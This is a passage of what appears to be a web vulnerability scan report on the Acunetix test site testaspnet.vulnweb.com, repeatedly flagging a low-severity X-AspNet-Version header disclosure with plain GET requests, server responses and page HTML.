href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. 
This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 13707
Response body (13707 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 14245
Response body (14245 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 13914
Response body (13914 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13912
Response body (13912 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13269
Response body (13269 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" 
height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" 
style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td 
align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. 
It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 22687
Response body (22687 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30393
Response body (30393 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 17827
Response body (17827 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 22752
Response body (22752 bytes)
href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 30454
Response body (30454 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 17888
Response body (17888 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" 
